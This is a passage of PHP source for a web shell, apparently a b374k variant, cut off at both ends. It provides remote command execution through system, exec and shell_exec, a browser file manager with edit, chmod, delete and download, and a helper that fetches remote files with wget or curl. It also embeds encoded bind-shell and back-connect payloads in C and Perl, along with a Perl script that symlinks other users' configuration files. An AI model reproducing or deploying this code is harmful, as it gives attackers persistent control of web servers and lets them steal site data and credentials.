;-)\r\n$my_ip = $_SERVER[\'REMOTE_ADDR\'];\r\n$admin_id=$_SERVER[\'SERVER_ADMIN\'];\r\n$bindport = "13123";\r\n$bindport_pass = "b374k";\r\n\r\n// separate the working direcotory\r\n$pwds = explode(DIRECTORY_SEPARATOR,$pwd);\r\n$pwdurl = "";\r\nfor($i = 0 ; $i < sizeof($pwds)-1 ; $i++){\r\n\t$pathz = "";\r\n\tfor($j = 0 ; $j <= $i ; $j++){\r\n\t\t$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;\r\n\t}\r\n\t$pwdurl .= "<a href=\\"?y=".$pathz."\\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";\r\n}\r\n\t\r\n// rename file or folder\r\nif(isset($_POST[\'rename\'])){\r\n\t$old = $_POST[\'oldname\'];\r\n\t$new = $_POST[\'newname\'];\r\n\t@rename($pwd.$old,$pwd.$new);\r\n\t$file = $pwd.$new;\r\n}\r\nif(isset($_POST[\'chmod\'])){ \r\n\t$name = $_POST[\'name\'];\r\n\t$value = $_POST[\'newvalue\'];\r\nif (strlen($value)==3){\r\n\t$value = 0 . "" . $value;}\r\n\t@chmod($pwd.$name,octdec($value));\r\n\t$file = $pwd.$name;}\r\n\t\r\nif(isset($_POST[\'chmod_folder\'])){\r\n\t$name = $_POST[\'name\'];\r\n\t$value = $_POST[\'newvalue\'];\r\nif (strlen($value)==3){\r\n\t$value = 0 . "" . $value;}\r\n\t@chmod($pwd.$name,octdec($value));\r\n\t$file = $pwd.$name;}\r\n\r\n\r\n// print useful info\r\n$buff  = "Software : <b>".$software."</b><br />";\r\n$buff .= "System OS : <b>".$system."</b><br />";\r\nif($id != "") $buff .= "ID : <b>".$id."</b><br />";\r\n$buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />";\r\n$buff .= "Server ip : <b>".$server_ip."</b> <span class=\\"gaya\\"> | </span> Your   ip : <b>".$my_ip."</b><span class=\\"gaya\\"> | </span> Admin : <b>".$admin_id."</b><br />";\r\n$buff .= "Free Disk: "."<span style=\'color:#00FF1E\'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";\r\nif($safemode) $buff .= "Safemode: <span class=\\"gaya\\"><b>ON</b></span><br />";\r\nelse $buff .= "Safemode: <span class=\\"gaya\\"><b>OFF</b></span><br />";\r\n$buff .= "Disabled Functions: ".showdisablefunctions()."<br />";\r\n$buff .= "MySQL: ".testmysql()."&nbsp;|&nbsp;MSSQL: ".testmssql()."&nbsp;|&nbsp;Oracle: ".testoracle()."&nbsp;|&nbsp;Perl: ".testperl()."&nbsp;|&nbsp;cURL: ".testcurl()."&nbsp;|&nbsp;WGet: ".testwget()."<br>";\r\n$buff .= "<font color=00ff00 ><b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>";\r\n\r\n\r\n\r\n\r\nfunction rapih($text){\r\n\treturn trim(str_replace("<br />","",$text));\r\n}\r\n\r\nfunction magicboom($text){\r\n\tif (!get_magic_quotes_gpc()) {\r\n   \t\t return $text;\r\n\t} \r\n\treturn stripslashes($text);\r\n}\r\n\r\nfunction showdir($pwd,$prompt){\r\n\t$fname = array();\r\n\t$dname = array();\r\n\tif(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;\r\n\telse $posix = FALSE;\r\n\t$user = "????:????";\r\n\tif($dh = @scandir($pwd)){\r\n\t\tforeach($dh as $file){\r\n\t\t\tif(is_dir($file)){\r\n\t\t\t\t$dname[] = $file;\r\n\t\t\t}\r\n\t\t\telseif(is_file($file)){\r\n\t\t\t\t$fname[] = $file;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\telse{\r\n\t\tif($dh = @opendir($pwd)){\r\n\t\t\twhile($file = @readdir($dh)){\r\n\t\t\t\tif(@is_dir($file)){\r\n\t\t\t\t\t$dname[] = $file;\r\n\t\t\t\t}\r\n\t\t\t\telseif(@is_file($file)){\r\n\t\t\t\t\t$fname[] = $file;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t@closedir($dh);\r\n\t\t}\r\n\t}\r\n\r\n\t\r\n\tsort($fname);\r\n\tsort($dname);\r\n\t$path = @explode(DIRECTORY_SEPARATOR,$pwd);\r\n\t$tree = @sizeof($path);\r\n\t$parent = "";\r\n\t$buff = "\r\n\t<form action=\\"?y=".$pwd."&amp;x=shell\\" method=\\"post\\" style=\\"margin:8px 0 0 0;\\">\r\n\t<table class=\\"cmdbox\\" style=\\"width:50%;\\">\r\n\t<tr><td><b>$prompt</b></td><td><input onMouseOver=\\"this.focus();\\" id=\\"cmd\\" class=\\"inputz\\" type=\\"text\\" name=\\"cmd\\" style=\\"width:400px;\\" value=\\"\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr>\r\n\t</form>\r\n\t<form action=\\"?\\" method=\\"get\\" style=\\"margin:8px 0 0 0;\\">\r\n\t<input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" />\r\n\t<tr><td><b>view file/folder</b></td><td><input onMouseOver=\\"this.focus();\\" id=\\"goto\\" class=\\"inputz\\" type=\\"text\\" name=\\"view\\" style=\\"width:400px;\\" value=\\"".$pwd."\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"View !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr>\r\n\t</form></table><table class=\\"explore\\">\r\n\t<tr><th>name</th><th style=\\"width:80px;\\">size</th><th style=\\"width:210px;\\">owner:group</th><th style=\\"width:80px;\\">perms</th><th style=\\"width:110px;\\">modified</th><th style=\\"width:190px;\\">actions</th></tr>\r\n\t";\r\n\tif($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;\r\n\telse $parent = $pwd;  \r\n\r\n\tforeach($dname as $folder){\r\n\t\tif($folder == ".") {\r\n\t\t\tif(!$win && $posix){\r\n\t\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$owner = $user;\r\n\t\t\t}\r\n\t\t\t$buff .= "<tr><td><a href=\\"?y=".$pwd."\\">$folder</a></td><td>LINK</td>\r\n\t\t\t<td style=\\"text-align:center;\\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>\r\n\t\t\t<td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\\"titik1\\">\r\n\t\t\t<a href=\\"?y=$pwd&amp;edit=".$pwd."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik1\',\'titik1_form\');\\">newfolder</a></span>\r\n\t\t\t<form action=\\"?\\" method=\\"get\\" id=\\"titik1_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" />\r\n\t\t\t<input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" />\r\n\t\t\t</form></td>\r\n\t\t\t\r\n\t\t\t</tr>\r\n\t\t\t";\r\n\t\t}\r\n\t\telseif($folder == "..") {\r\n\t\t\tif(!$win && $posix){\r\n\t\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$owner = $user;\r\n\t\t\t}\r\n\t\t\t$buff .= "<tr><td><a href=\\"?y=".$parent."\\"><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC\'>   $folder</a></td><td>LINK</td>\r\n\t\t\t<td style=\\"text-align:center;\\">".$owner."</td>\r\n\t\t\t<td><center>".get_perms($parent)."</center></td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($parent))."</td>\r\n\t\t\t<td><span id=\\"titik2\\"><a href=\\"?y=$pwd&amp;edit=".$parent."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik2\',\'titik2_form\');\\">newfolder</a></span>\r\n\t\t\t<form action=\\"?\\" method=\\"get\\" id=\\"titik2_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" />\r\n\t\t\t<input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" />\r\n\t\t\t</form>\r\n\t\t\t</td></tr>";\r\n\t\t}\r\n\t\telse {\r\n\t\t\tif(!$win && $posix){\r\n\t\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$owner = $user;\r\n\t\t\t}\r\n\t\t\t$buff .= "<tr><td><a id=\\"".clearspace($folder)."_link\\" href=\\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\\"><b><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==\' />     [ $folder ]</b></a>\r\n\t\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" />\r\n\t\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$folder."\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($folder)."_form\',\'".clearspace($folder)."_link\');\\" />\r\n\t\t\t</form><td>DIR</td><td style=\\"text-align:center;\\">".$owner."</td>\r\n\t\t\t<td><center>\r\n\t\t\t<a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form3\');\\">".get_perms($pwd.$folder)."</a>\r\n\t\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form3\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> \r\n\t\t\t<input type=\\"hidden\\" name=\\"name\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" /> \r\n\t\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newvalue\\" value=\\"".substr(sprintf(\'%o\', fileperms($pwd.$folder)), -4)."\\" /> \r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"chmod_folder\\" value=\\"chmod\\" /> \r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" \r\n\t\t\tonclick=\\"tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form3\');\\" /></form></center></td>\r\n\t\t\t<td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;fdelete=".$pwd.$folder."\\">delete</a></td></tr>";\r\n\t\t}\r\n\t}\r\n\r\n\tforeach($fname as $file){\r\n\t\t$full = $pwd.$file;\r\n\t\tif(!$win && $posix){\r\n\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t}\r\n\t\telse {\r\n\t\t\t$owner = $user;\r\n\t\t}\t\t\r\n\t\t$buff .= "<tr><td><a id=\\"".clearspace($file)."_link\\" href=\\"?y=$pwd&amp;view=$full\\"><b><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=\' />   $file</b></a>\r\n\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t<input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" />\r\n\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$file."\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\" />\r\n\t\t</form></td><td>".ukuran($full)."</td><td style=\\"text-align:center;\\">".$owner."</td><td><center>\r\n\t\t<a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form2\');\\">".get_perms($full)."</a>\r\n\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form2\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> \r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" /> \r\n<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newvalue\\" value=\\"".substr(sprintf(\'%o\', fileperms($full)), -4)."\\" /> \r\n<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"chmod\\" value=\\"chmod\\" /> \r\n<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form2\');\\" /></form></center></td>\r\n\t\t<td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($full))."</td>\r\n\t\t<td><a href=\\"?y=$pwd&amp;edit=$full\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;delete=$full\\">delete</a> | <a href=\\"?y=$pwd&amp;dl=$full\\">download</a>&nbsp;(<a href=\\"?y=$pwd&amp;dlgzip=$full\\">gzip</a>)</td></tr>";\r\n\t}\r\n\t$buff .= "</table>";\r\n\treturn $buff;\r\n}\r\n\r\nfunction ukuran($file){\r\n\tif($size = @filesize($file)){\r\n\t\tif($size <= 1024) return $size;\r\n\t\telse{\r\n\t\t\tif($size <= 1024*1024) {\r\n\t\t\t\t$size = @round($size / 1024,2);;\r\n\t\t\t\treturn "$size kb";\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$size = @round($size / 1024 / 1024,2);\r\n\t\t\t\treturn "$size mb";\t\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\telse return "???";\r\n}\r\n\r\nfunction exe($cmd){\r\n\tif(function_exists(\'system\')) {\r\n\t\t@ob_start();\r\n\t\t@system($cmd);\r\n\t\t$buff = @ob_get_contents();\r\n\t\t@ob_end_clean();\r\n\t\treturn $buff;\r\n\t}\r\n\telseif(function_exists(\'exec\')) {\r\n\t\t@exec($cmd,$results);\r\n\t\t$buff = "";\r\n\t\tforeach($results as $result){\r\n\t\t\t$buff .= $result;\r\n\t\t}\r\n\t\treturn $buff;\r\n\t}\r\n\telseif(function_exists(\'passthru\')) {\r\n\t\t@ob_start();\r\n\t\t@passthru($cmd);\r\n\t\t$buff = @ob_get_contents();\r\n\t\t@ob_end_clean();\r\n\t\treturn $buff;\r\n\t}\r\n\telseif(function_exists(\'shell_exec\')){\r\n\t\t$buff = @shell_exec($cmd);\r\n\t\treturn $buff;\r\n\t}\r\n}\r\n\r\nfunction tulis($file,$text){\r\n\t$textz = gzinflate(base64_decode($text));\r\n\t if($filez = @fopen($file,"w"))\r\n\t {\r\n\t\t @fputs($filez,$textz);\r\n\t\t @fclose($file);\r\n\t }\r\n}\r\n\r\nfunction ambil($link,$file) { \r\n   if($fp = @fopen($link,"r")){\r\n\t   while(!feof($fp)) { \r\n   \t\t    $cont.= @fread($fp,1024); \r\n   \t\t} \r\n   \t\t@fclose($fp); \r\n\t   $fp2 = @fopen($file,"w"); \r\n\t   @fwrite($fp2,$cont); \r\n\t   @fclose($fp2); \r\n   }\r\n}\r\n\r\nfunction which($pr){\r\n\t$path = exe("which $pr");\r\n\tif(!empty($path)) { return trim($path); } else { return trim($pr); }\r\n}\r\n\r\nfunction download($cmd,$url){\r\n\t$namafile = basename($url);\r\n\tswitch($cmd) {\r\n\t\tcase \'wwget\': exe(which(\'wget\')." ".$url." -O ".$namafile);break;\r\n\t\tcase \'wlynx\': exe(which(\'lynx\')." -source ".$url." > ".$namafile);break;\r\n\t\tcase \'wfread\' : ambil($wurl,$namafile);break;\r\n\t\tcase \'wfetch\' : exe(which(\'fetch\')." -o ".$namafile." -p ".$url);break;\r\n\t\tcase \'wlinks\' : exe(which(\'links\')." -source ".$url." > ".$namafile);break;\r\n\t\tcase \'wget\' : exe(which(\'GET\')." ".$url." > ".$namafile);break;\r\n\t\tcase \'wcurl\' : exe(which(\'curl\')." ".$url." -o ".$namafile);break;\r\n\t\tdefault: break;\r\n\t}\r\n\treturn $namafile;\r\n}\r\n\r\nfunction get_perms($file)\r\n{\r\n\tif($mode=@fileperms($file)){\r\n\t\t$perms=\'\';\r\n\t\t$perms .= ($mode & 00400) ? \'r\' : \'-\';\r\n\t\t$perms .= ($mode & 00200) ? \'w\' : \'-\';\r\n\t\t$perms .= ($mode & 00100) ? \'x\' : \'-\';\r\n\t\t$perms .= ($mode & 00040) ? \'r\' : \'-\';\r\n\t\t$perms .= ($mode & 00020) ? \'w\' : \'-\';\r\n\t\t$perms .= ($mode & 00010) ? \'x\' : \'-\';\r\n\t\t$perms .= ($mode & 00004) ? \'r\' : \'-\';\r\n\t\t$perms .= ($mode & 00002) ? \'w\' : \'-\';\r\n\t\t$perms .= ($mode & 00001) ? \'x\' : \'-\';\r\n\t\treturn $perms;\r\n\t}\r\n\telse return "??????????";\r\n}\r\n\r\nfunction clearspace($text){\r\n\treturn str_replace(" ","_",$text);\r\n}\r\n\r\n// net tools\r\n$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf\r\n+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE\r\nP/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ\r\ndKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL\r\n3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug\r\nUq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk\r\nHDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W\r\ntyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL\r\nZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6\r\nuPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";\r\n$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1\r\nNmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg\r\ntNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD\r\ne/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0\r\nLSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo\r\nvaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB\r\n+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";\r\n$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St\r\nktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j\r\nS2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ\r\nja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw\r\nTskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";\r\n$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA\r\nBYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95\r\nzzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75\r\ni+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A\r\nRkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY\r\njwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F\r\n6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";\r\n//confshell\r\n$configshell = \'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1